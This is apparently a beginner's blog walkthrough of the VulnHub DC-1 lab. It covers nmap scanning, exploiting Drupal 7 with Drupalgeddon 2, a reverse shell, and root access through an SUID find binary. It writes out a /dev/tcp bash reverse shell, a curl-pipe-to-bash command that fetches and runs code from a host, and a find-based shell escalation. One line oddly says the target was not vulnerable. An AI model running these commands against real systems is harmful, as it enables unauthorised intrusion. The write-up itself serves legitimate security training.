It’s been a while since I wrote, creating this series of me hacking through the DC VMs from Vulnhub should be the perfect opportunity.
I’ll skip the discovering IP part, if you’ve read previous articles it should be pretty straightforward.
Running a fast scan on all ports to discover which ports are open.
nmap -sS -p- --min-rate=1000 192.168.56.104
Now we can deep dive and use nmap scripts to get the versions and some more information on the services running.
nmap -sC -sV -p 22,80,111,52587 -oN DC:1.tcpscan 192.168.56.104
Drupal 7 is running on Apache based on the nmap output and we can verify that by checking on the browser.
You can also use wappalyzer plugin to get the version of Drupal running as well.
If you’ve come across Drupal before you might have heard of Drupalgeddon.
Fortunately, Drupal 7 is exploitable by Drupalgeddon 2 which exploits the RCE vulnerability. Here’s a good repo that has the PoC to verify this.
Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002) - dreadlocked/Drupalgeddon2
This didn’t happen to be vulnerable.
Running the PoC proves the vulnerability and gives the ability for remote code execution.
Getting shell and privilege escalation
The exploit runs as a web shell which is not very ideal, so it’s better to get a reverse shell which runs bash.
I hosted a shell script on my kali with this command:
bash -i >& /dev/tcp/192.168.56.1/9001 0>&1
Then ran on the prompt given by the exploit:
curl http://192.168.56.1/shell.sh | bash
This way I got a reverse shell on nc listening on 9001.
What I like to do after I get shell is run LinEnum to find possible ways to privesc.
Looking through the output, find has it’s SUID bit set.
We can abuse that to get root privileges!
find . -exec /bin/sh \; -quit
Using this find command from gtfobins we get root and read the final flag.
For this VM my goal was just getting root, for future VMs I’ll try to work on some post exploitation and explore more ways to exploit and privesc. This VM is for beginner and exploiting it is straightforward.